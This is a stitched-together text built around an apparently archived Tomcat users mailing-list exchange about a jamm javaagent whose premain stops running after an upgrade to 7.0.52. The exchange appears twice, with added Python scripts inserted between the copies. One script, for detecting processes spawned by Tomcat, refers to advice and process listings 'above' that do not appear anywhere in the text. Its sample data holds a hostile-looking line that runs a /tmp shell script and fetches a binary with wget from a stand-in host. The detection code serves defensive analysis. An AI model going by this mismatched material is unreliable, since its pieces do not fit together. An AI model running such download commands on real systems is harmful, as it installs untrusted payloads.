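The two checks Konstantin and Chris ask for above (is the `sh` really a child of the JVM that runs Tomcat, and which processes hang off it) can be scripted over `ps` output. The following is an added example and not code from the thread: it parses `ps -eo pid,ppid,user,comm,args` style output, identifies JVMs running Tomcat by the `org.apache.catalina.startup.Bootstrap` class or a `-Dcatalina.base=` setting on their command line, and lists every descendant with the ancestry that produced it, since a stock Tomcat with CGI and SSI disabled spawns no processes at all. The `SAMPLE_PS` listing is constructed and modelled on the thread's output; the PIDs, the jenkins JVM and the `EXAMPLE-HOST` download host are made up.

```python
"""Added example: find child processes spawned by the Tomcat JVM in `ps` output.

Not code from the thread. It parses `ps -eo pid,ppid,user,comm,args` style
output, identifies JVMs that run Tomcat (by the Bootstrap class or a
catalina.base setting on their command line) and reports every descendant,
because Tomcat itself does not spawn processes unless CGI/SSI is enabled.
"""
from collections import defaultdict

# Constructed sample, modelled on the listing in the thread. PIDs, the
# jenkins JVM and the download host are made up.
SAMPLE_PS = """\
  PID  PPID USER     COMMAND         COMMAND
    1     0 root     init            /sbin/init
 1200     1 root     sshd            /usr/sbin/sshd
 8800     1 tomcat   java            /usr/java/default/bin/java -Dcatalina.base=/opt/tomcat -classpath /opt/tomcat/bin/bootstrap.jar org.apache.catalina.startup.Bootstrap start
 8882  8800 tomcat   sh              sh /tmp/4.sh
 8893  8882 tomcat   wget            wget http://EXAMPLE-HOST/squid32 -O /tmp/squid
 9100     1 jenkins  java            /usr/bin/java -jar /opt/jenkins/jenkins.war
 9150  9100 jenkins  sh              sh -c git fetch
"""

TOMCAT_MARKERS = ("org.apache.catalina.startup.Bootstrap", "-Dcatalina.base=")


def parse_ps(text):
    """Map pid -> {pid, ppid, user, comm, args}; the first line is the header."""
    procs = {}
    for line in text.splitlines()[1:]:
        if not line.strip():
            continue
        pid, ppid, user, comm, args = line.split(None, 4)
        procs[int(pid)] = {"pid": int(pid), "ppid": int(ppid),
                           "user": user, "comm": comm, "args": args}
    return procs


def tomcat_jvms(procs):
    """Only JVMs whose command line shows they run Tomcat, not any java process."""
    return [p for p in procs.values()
            if p["comm"] == "java" and any(m in p["args"] for m in TOMCAT_MARKERS)]


def descendants(procs, root_pid):
    """Breadth-first list of every process below root_pid."""
    children = defaultdict(list)
    for p in procs.values():
        children[p["ppid"]].append(p["pid"])
    found, queue = [], list(children[root_pid])
    while queue:
        pid = queue.pop(0)
        found.append(pid)
        queue.extend(children[pid])
    return found


def chain(procs, pid, top_pid):
    """Command names from the JVM down to pid, e.g. 'java -> sh -> wget'."""
    names = []
    while pid in procs:
        names.append(procs[pid]["comm"])
        if pid == top_pid:
            break
        pid = procs[pid]["ppid"]
    return " -> ".join(reversed(names))


def report(ps_text):
    """Every process under a Tomcat JVM, with the ancestry that produced it."""
    procs = parse_ps(ps_text)
    findings = []
    for jvm in tomcat_jvms(procs):
        for pid in descendants(procs, jvm["pid"]):
            p = procs[pid]
            findings.append({"jvm": jvm["pid"], "pid": pid, "user": p["user"],
                             "chain": chain(procs, pid, jvm["pid"]), "args": p["args"]})
    return findings


if __name__ == "__main__":
    for f in report(SAMPLE_PS):
        print(f"tomcat jvm {f['jvm']}: pid {f['pid']} ({f['user']}) {f['chain']}: {f['args']}")
```

On a live host, feed it the real `ps -eo pid,ppid,user,comm,args` output; the jenkins JVM's shell in the sample is deliberately not reported because that JVM is not Tomcat. A hit here is the cue for the thread dump Konstantin links to, which shows the Java stack that called `Process.exec()`; note that `comm` is just the process's own name and a running program can change it, so the parent chain, not the name, is the evidence.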



Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-30 Thread Fredrik

Konstantin Kolinko skrev 2014-04-30 01:17:

2014-04-29 12:28 GMT+04:00 Fredrik :

Hello.
We're using jamm (https://github.com/jbellis/jamm) a java agent for
measuring object memory usage, passing the javaagent argument
to tomcat as
"-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
When running 7.0.50 everything works as expected but after upgrading to
7.0.52 the initialization code of the agent (premain-method) isn't called
anymore.
Any ideas?


I understand that that means that you have the same jar present in
both the System classloader and the Webapp classloader.

You should remove that jar from WEB-INF/lib directory of that webapp.

IIRC, in 7.0.50 and earlier Tomcat preferred the class from the system
classloader (effectively ignoring the webapp's jar).

In 7.0.52 it does load the class provided by web application.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

Now I get what you mean (I guess). Specifying the javaagent option will 
automagically add the jar to the system classloader, but when the webapp 
is loaded it's also added to the webapp classloader, since it resides in 
webapps/ROOT/WEB-INF/lib/. In < 7.0.50 Tomcat will load the jar in the 
system classloader, but in > 7.0.52 it loads it into the webapp 
classloader, which means we'll have a conflict (same jar in different 
classloaders).


Thanks.
/Fredrik


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org
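The situation Konstantin and Fredrik describe above, one jar reachable both through the system class loader (via `-javaagent:`) and through a webapp's `WEB-INF/lib`, is easy to check for before an upgrade changes which copy wins. The following is an added example, not the project's or the thread's code: it extracts the agent jars from a JVM command line, resolves relative paths against the JVM's working directory (the thread's `../../tomcat/...` form), and reports every `webapps/*/WEB-INF/lib/*.jar` that is the same file, has the same bytes, or carries the same file name. The `demo` layout, the `FAKE_JAR` bytes and the `app/bin` working directory are constructed for the illustration; `demo(fixed=True)` shows the layout after the jar is moved out of `WEB-INF/lib` into `tomcat/lib`, as Fredrik did.

```python
"""Added example: detect a -javaagent jar that is also under a webapp's WEB-INF/lib.

Not the project's code. Given a JVM command line and a CATALINA_BASE, it
reports webapp jars that are the same file, the same bytes or the same
file name as an agent jar: the agent already lives in the system class
loader, and a copy in WEB-INF/lib hands the web app a second copy.
"""
import hashlib
import shlex
import tempfile
from pathlib import Path

# Constructed placeholder bytes, not a real jar.
FAKE_JAR = b"PK\x03\x04 constructed placeholder, not a real jar"


def javaagent_jars(cmdline):
    """Jar paths from -javaagent:<jar>[=options] tokens on the command line."""
    jars = []
    for tok in shlex.split(cmdline):
        if tok.startswith("-javaagent:"):
            jars.append(tok[len("-javaagent:"):].split("=", 1)[0])
    return jars


def sha256_of(path):
    return hashlib.sha256(Path(path).read_bytes()).hexdigest()


def agent_conflicts(cmdline, catalina_base, cwd):
    """Webapp jars that collide with an agent jar (same path, bytes or name)."""
    conflicts = []
    webapp_jars = sorted(Path(catalina_base).glob("webapps/*/WEB-INF/lib/*.jar"))
    for spec in javaagent_jars(cmdline):
        agent = (Path(cwd) / spec).resolve()  # relative agent paths are relative to the JVM's cwd
        if not agent.is_file():
            conflicts.append({"agent": str(agent), "jar": None, "reason": "agent jar not found"})
            continue
        agent_digest = sha256_of(agent)
        for jar in webapp_jars:
            if jar.resolve() == agent:
                reason = "same file"
            elif sha256_of(jar) == agent_digest:
                reason = "same bytes"
            elif jar.name == agent.name:
                reason = "same file name"
            else:
                continue
            conflicts.append({"agent": str(agent), "jar": str(jar), "reason": reason})
    return conflicts


def demo(fixed=False):
    """Build a constructed layout mirroring the thread's paths and run the check.

    fixed=False: the agent jar sits in webapps/ROOT/WEB-INF/lib (the reported setup).
    fixed=True:  the jar has been moved to tomcat/lib and -javaagent points there.
    """
    with tempfile.TemporaryDirectory() as root:
        root = Path(root)
        base = root / "tomcat"
        cwd = root / "app" / "bin"  # the JVM's working directory in this layout
        cwd.mkdir(parents=True)
        (base / "lib").mkdir(parents=True)
        webapp_lib = base / "webapps" / "ROOT" / "WEB-INF" / "lib"
        webapp_lib.mkdir(parents=True)
        other_lib = base / "webapps" / "other" / "WEB-INF" / "lib"
        other_lib.mkdir(parents=True)
        (other_lib / "unrelated.jar").write_bytes(b"PK\x03\x04 some other library")
        if fixed:
            (base / "lib" / "jamm-0.2.3.jar").write_bytes(FAKE_JAR)
            agent = "../../tomcat/lib/jamm-0.2.3.jar"
        else:
            (webapp_lib / "jamm-0.2.3.jar").write_bytes(FAKE_JAR)
            agent = "../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar"
        cmdline = f"java -javaagent:{agent} org.apache.catalina.startup.Bootstrap start"
        return agent_conflicts(cmdline, base, cwd)


if __name__ == "__main__":
    print("as reported:", demo())
    print("after move :", demo(fixed=True))
```

The digest comparison catches the case where the same library is copied rather than referenced in place, and the name comparison catches a differently built copy of the same artifact; either way the fix is the one Konstantin gives, a single copy that is not under `WEB-INF/lib`.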





Re: javaagent initialization (premain-method) not triggered by tomcat 7.0.52

2014-04-30 Thread Fredrik

Konstantin Kolinko skrev 2014-04-30 01:17:

2014-04-29 12:28 GMT+04:00 Fredrik :

Hello.
We're using jamm (https://github.com/jbellis/jamm) a java agent for
measuring object memory usage, passing the javaagent argument
to tomcat as
"-javaagent:../../tomcat/webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar".
When running 7.0.50 everything works as expected but after upgrading to
7.0.52 the initialization code of the agent (premain-method) isn't called
anymore.
Any ideas?


I understand that that means that you have the same jar present in
both the System classloader and the Webapp classloader.

You should remove that jar from WEB-INF/lib directory of that webapp.

IIRC, in 7.0.50 and earlier Tomcat preferred the class from the system
classloader (effectively ignoring the webapp's jar).

In 7.0.52 it does load the class provided by web application.

Best regards,
Konstantin Kolinko

-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org

I only have one jar which is placed at 
(webapps/ROOT/WEB-INF/lib/jamm-0.2.3.jar).
A little bit strange, but when I moved the jar to tomcat/lib the 
agent starts working as expected.


Regards
/Fredrik


-
To unsubscribe, e-mail: users-unsubscr...@tomcat.apache.org
For additional commands, e-mail: users-h...@tomcat.apache.org